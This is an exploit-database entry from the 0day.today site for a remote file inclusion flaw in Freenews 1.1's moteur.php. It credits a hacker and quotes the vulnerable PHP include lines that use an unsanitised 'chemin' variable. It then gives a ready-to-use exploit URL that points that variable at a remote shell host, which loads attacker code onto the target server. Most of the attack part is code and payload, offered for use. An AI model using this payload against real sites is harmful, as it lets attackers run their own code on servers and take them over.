[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Freenews <= 1.1 (moteur.php) Remote File Include Vulnerability

Author
xoron
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-935
Category
web applications
Date add
07-10-2006
Platform
unsorted
==============================================================
Freenews <= 1.1 (moteur.php) Remote File Include Vulnerability
==============================================================




-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Freenews v1.1 <= (chemin) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by XORON(turkish hacker)


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CODE:

include ("$chemin/moteur/moteur_form.php");
include ("$chemin/moteur/moteur_tab_results.php");

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://www.hedef.com/[freenews_path]/moteur/moteur.php?chemin=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: Preddy, Ironfist, Stansar, SHiKaA, O.G,DJR


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



#  0day.today [2024-12-25]  #